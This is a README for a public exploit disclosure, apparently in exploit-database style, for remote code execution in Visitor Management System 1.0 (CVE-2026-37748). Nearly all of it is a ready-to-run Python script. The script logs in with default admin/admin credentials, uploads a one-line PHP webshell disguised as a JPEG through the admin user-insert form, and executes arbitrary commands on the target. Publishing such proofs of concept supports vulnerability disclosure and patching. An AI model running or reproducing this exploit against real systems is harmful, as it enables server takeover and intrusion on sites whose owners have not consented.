README.md
Rendering markdown...
# Exploit Title: Visitor Management System 1.0 - Remote Code Execution
# Date: 2026-04-02
# Exploit Author: Varad AP Mene ([email protected])
# Vendor: https://github.com/sanjay1313/Visitor-Management-System
# Version: 1.0
# CVE: CVE-2026-37748
# Tested on: Windows 10 / XAMPP, Kali Linux
import requests
import argparse
import sys
WEBSHELL = b'<?php system($_GET["cmd"]); ?>'
def login(base_url, session):
url = f"{base_url}/vms/index.php"
data = {'username': 'admin', 'password': 'admin', 'submit': 'submit'}
r = session.post(url, data=data, timeout=10)
return r.status_code == 200
def upload_shell(base_url, session):
url = f"{base_url}/vms/php/admin_user_insert.php"
files = {'image': ('shell.php', WEBSHELL, 'image/jpeg')}
data = {'name': 'test', 'username': 'test123',
'password': 'test123', 'submit': 'submit'}
r = session.post(url, files=files, data=data, timeout=10)
return r.status_code == 200
def execute(base_url, session, cmd):
url = f"{base_url}/vms/images/shell.php"
r = session.get(url, params={'cmd': cmd}, timeout=10)
return r.text.strip()
def main():
parser = argparse.ArgumentParser(description='CVE-2026-37748 PoC')
parser.add_argument('--url', required=True, help='Target URL')
parser.add_argument('--cmd', default='id', help='Command to execute')
args = parser.parse_args()
base = args.url.rstrip('/')
session = requests.Session()
print(f"[*] Target: {base}")
print(f"[*] Logging in...")
if not login(base, session):
print("[-] Login failed"); sys.exit(1)
print("[+] Login successful!")
print("[*] Uploading webshell...")
if not upload_shell(base, session):
print("[-] Upload failed"); sys.exit(1)
print(f"[+] Shell uploaded → {base}/vms/images/shell.php")
print(f"[*] Executing: {args.cmd}")
result = execute(base, session, args.cmd)
print(f"[+] Result:\n{result}")
if __name__ == '__main__':
main()